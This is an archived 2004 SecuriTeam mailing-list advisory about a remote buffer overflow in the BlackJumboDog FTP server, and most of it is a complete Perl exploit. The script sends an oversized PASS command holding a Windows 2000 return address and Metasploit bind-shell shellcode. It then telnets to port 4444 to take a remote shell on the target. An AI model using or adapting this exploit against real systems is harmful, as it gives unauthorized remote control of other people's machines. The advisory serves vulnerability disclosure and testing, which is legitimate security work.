[EXPL] BlackJumboDog Remote Buffer Overflow Exploit Code

From: SecuriTeam (support_at_securiteam.com)
Date: 08/04/04

  • Next message: SecuriTeam: "[UNIX] Linpha 0.9.4 Authentication Bypass" 
    To: list@securiteam.com
Date: 4 Aug 2004 23:20:43 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      BlackJumboDog Remote Buffer Overflow Exploit Code
    ------------------------------------------------------------------------

    SUMMARY

    A remote buffer overflow was found and reported in our previously featured
    article ' <http://www.securiteam.com/windowsntfocus/5AP040ADPW.html>
    BlackJumboDog FTP Server Buffer Overflow'.

    The following proof-of-concept script can help test the vulnerability
    against potentially vulnerable servers.

    DETAILS

    Exploit:

    #!/usr/bin/perl
    #
    # blackJumboDog Exploit code by Tal zeltzer
    #

    use strict;
    use IO::Socket::INET;

    usage() unless(@ARGV == 2);

    my $host = shift(@ARGV);
    my $port = shift(@ARGV);

    # win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444
    Size=399 ] http://metasploit.com
    my $shellcode =
    "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85".
    "\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19".
    "\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05".
    "\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0".
    "\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74".
    "\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15".
    "\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14".
    "\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53".
    "\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce".
    "\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf".
    "\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb".
    "\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18".
    "\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6".
    "\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16".
    "\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f".
    "\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c".
    "\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18".
    "\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f".
    "\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8".
    "\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e".
    "\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f".
    "\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27".
    "\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2".
    "\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a".
    "\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

    my $socket =
    IO::Socket::INET->new(proto=>'tcp',PeerAddr=>$host,PeerPort=>$port);
    $socket or die "Cannot connect to host!\n";

    print "[+] Connected to host\r\n";

    $socket->autoflush(1);

    #receive banner

    my $repcode = "220 ";
    my $response = recv_reply($socket,$repcode);

    #send USER command

    my $username = "anonymous";
    print $socket "USER $username\r\n";

    $repcode = "";

    select(undef, undef, undef, 1.002); # sleep of 1.2 sec

    #Send PASS Command ( Evil Buffer )
    # EIP At 308
    # 7C4E2F60 - jmp ebx On kernel32.dll ( Windows 2000 SP4 )

    printf "[+] Sending shellcode\r\n";

    my $buf = "A"x308;
    $buf = $buf . "\xEB\x06\xEB\x06"; # Jump 6 bytes forward
    $buf = $buf . "\x60\x2F\x4E\x7C";
    $buf = $buf . $shellcode;
    print $socket "PASS $buf\r\n";

    select(undef, undef, undef, 1.002); # sleep of 1.2 sec

    $repcode = "";
    recv_reply($socket, $repcode);

    close($socket);

    system("telnet $host 4444");

    exit(0);

    sub usage
    {
    # print usage information
    print "\nUsage: jumbo.pl <host> <port>\n
    <host> - The host to connect to
    <port> - The TCP port\n\n";
    exit(1);
    }

    sub recv_reply
    {
    # retrieve any reply
    my $socket = shift;
    my $repcode = shift;
    $socket or die "Can't receive on socket\n";

    my $res="";
    while(<$socket>)
    {
    $res .= $_;
    if (/$repcode/) { last; }
    }
    return $res;
    }

    ADDITIONAL INFORMATION

    The information has been provided by Tal Zeltzer of
    <mailto:expert@securiteam.com> SecuriTeam Experts.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] Linpha 0.9.4 Authentication Bypass"

    Relevant Pages